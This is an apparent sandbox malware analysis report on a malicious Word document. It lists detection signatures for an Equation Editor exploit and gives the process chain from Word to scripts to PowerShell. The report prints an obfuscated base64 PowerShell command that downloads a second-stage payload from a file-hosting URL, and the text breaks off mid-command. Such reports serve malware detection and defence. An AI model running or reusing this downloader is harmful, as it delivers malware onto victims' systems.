Windows
Analysis Report
ConfirmaciXnXdeXfacturaXPedidoXadicional.doc
Overview
General Information
Detection
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%
Signatures
Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Sigma detected: EQNEDT32.EXE connecting to internet
Sigma detected: File Dropped By EQNEDT32EXE
Suricata IDS alerts for network traffic
System process connects to network (likely due to code injection or exploit)
Yara detected Powershell download and execute
Bypasses PowerShell execution policy
Connects to a pastebin service (likely for C&C)
Document exploit detected (process start blacklist hit)
Installs new ROOT certificates
Obfuscated command line found
Office equation editor establishes network connection
Office equation editor starts processes (likely CVE-2017-11882 or CVE-2018-0802)
Potential malicious VBS script found (has network functionality)
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: Equation Editor Network Connection
Sigma detected: HackTool - CrackMapExec PowerShell Obfuscation
Sigma detected: Potential PowerShell Command Line Obfuscation
Sigma detected: Potential PowerShell Obfuscation Via Reversed Commands
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: Script Initiated Connection to Non-Local Network
Sigma detected: Suspicious Microsoft Office Child Process
Sigma detected: WScript or CScript Dropper
Sigma detected: WScript or CScript Dropper - File
Suspicious execution chain found
Suspicious powershell command line found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Wscript starts Powershell (via cmd or directly)
Yara detected Generic Downloader
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Office Equation Editor has been started
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Script Initiated Connection
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Stores large binary data to the registry
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara signature match
Classification
- System is w7x64
- WINWORD.EXE (PID: 3520 cmdline: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding MD5: 9EE74859D22DAE61F1750B3A1BACB6F5)
- EQNEDT32.EXE (PID: 3600 cmdline: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
- wscript.exe (PID: 3764 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\gdfgcvbi.vbs" MD5: 979D74799EA6C8B8167869A68DF5204A)
- wscript.exe (PID: 3820 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\gDHxsqtDodRnltJFOd.js" MD5: 979D74799EA6C8B8167869A68DF5204A)
- powershell.exe (PID: 3916 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LgAgACgAIAAoAFsAUwB0AHIAaQBuAEcAXQAkAHYARQBSAEIAbwBTAGUAUAByAGUARgBFAHIAZQBOAGMAZQApAFsAMQAsADMAXQArACcAeAAnAC0AagBvAEkAbgAnACcAKQAoACgAJwBLADYAcABpAG0AYQBnAGUAVQByAGwAJwArACcAIAA9ACAAcwAnACsAJwBTAFgAaAB0AHQAcABzADoALwAnACsAJwAvADEAMAAxADcALgBmAGkAbABlAG0AYQBpAGwALgBjAG8AbQAnACsAJwAvAGEAcABpACcAKwAnAC8AZgBpAGwAZQAvAGcAZQB0AD8AZgBpAGwAZQBrAGUAeQAnACsAJwA9ADIAJwArACcAQQBhACcAKwAnAF8AYgBXAG8AOQBSAGUAdQA0ADUAdAA3AEIAVQAxAGsAVgBnAHMAZAA5ACcAKwAnAHAAVAA5AHAAJwArACcAZwBTAFMAbAB2AFMAdABHAHIAbgBUAEkAJwArACcAQwBmAEYAaABtAFQASwBqACcAKwAnADMATABDADYAUwBRAHQASQBjAE8AYwBfAFQAMwA1AHcAJgBwAGsAXwB2AGkAZAA9AGYAZAA0AGYANgAxADQAYgBiADIAMAA5AGMANgAyAGMAMQA3ADMAMAA5ADQANQAxADcANgBhADAAOQAwADQAZgAgAHMAUwBYADsASwA2AHAAdwBlAGIAQwBsAGkAZQBuAHQAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDACcAKwAnAGwAaQBlAG4AdAA7AEsANgBwAGkAbQBhAGcAZQBCAHkAdABlAHMAIAA9ACAASwA2AHAAdwBlACcAKwAnAGIAQwBsAGkAZQBuAHQALgBEAG8AdwBuAGwAbwBhACcAKwAnAGQARABhAHQAYQAoAEsANgBwAGkAbQBhAGcAZQBVAHIAbAApADsASwA2AHAAaQBtAGEAZwBlAFQAZQB4AHQAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgASwA2AHAAaQBtAGEAZwBlAEIAeQB0AGUAcwApADsASwA2AHAAcwB0AGEAcgB0AEYAbABhAGcAIAA9ACAAcwBTAFgAPAA8AEIAQQBTAEUANgA0AF8AUwBUAEEAUgBUAD4APgBzAFMAWAA7AEsANgBwAGUAbgBkAEYAbABhAGcAIAA9ACAAcwAnACsAJwBTAFgAPAA8AEIAQQBTAEUANgA0AF8ARQAnACsAJwBOAEQAPgA+AHMAUwBYADsASwA2AHAAcwB0AGEAcgAnACsAJwB0AEkAbgBkAGUAeAAgAD0AIABLADYAcABpAG0AYQBnAGUAVABlAHgAdAAuAEkAbgBkAGUAeABPAGYAKABLADYAcABzAHQAYQByAHQARgBsAGEAZwApADsASwA2AHAAZQBuAGQASQBuAGQAZQB4ACAAPQAgAEsANgBwAGkAbQBhAGcAZQBUAGUAeAB0AC4ASQBuAGQAZQB4AE8AZgAoAEsANgBwAGUAbgBkAEYAbABhAGcAKQA7AEsAJwArACcANgBwAHMAdABhAHIAdABJAG4AZABlAHgAIAAtAGcAZQAgADAAIAAtAGEAbgBkACAASwA2AHAAZQBuAGQASQBuAGQAZQB4ACAALQBnAHQAJwArACcAIABLADYAcABzAHQAYQByAHQASQBuAGQAZQB4ADsASwA2AHAAcwB0AGEAcgB0AEkAbgBkAGUAeAAgACsAPQAgAEsANgBwAHMAdABhAHIAdABGAGwAYQBnAC4ATABlAG4AZwB0AGgAOwBLADYAcABiAGEAcwBlADYANABMAGUAbgBnAHQAaAAgAD0AIABLADYAcABlAG4AZABJAG4AZABlAHgAIAAtACAASwA2AHAAcwB0AGEAcgB0AEkAbgBkAGUAeAA7AEsANgBwAGIAYQBzAGUANgAnACsAJwA0AEMAbwBtAG0AYQBuAGQAIAA9ACAASwA2AHAAaQBtAGEAZwBlACcAKwAnAFQAZQB4AHQALgBTAHUAYgBzAHQAcgBpAG4AZwAoAEsANgBwAHMAdABhAHIAdABJAG4AZABlAHgALAAgAEsANgBwAGIAYQBzAGUANgA0AEwAZQBuAGcAdABoACkAOwBLADYAcABiAGEAcwBlADYANABSAGUAdgBlAHIAcwBlAGQAIAA9ACAALQBqAG8AaQBuACAAKABLADYAcABiAGEAcwBlADYANABDAG8AbQBtAGEA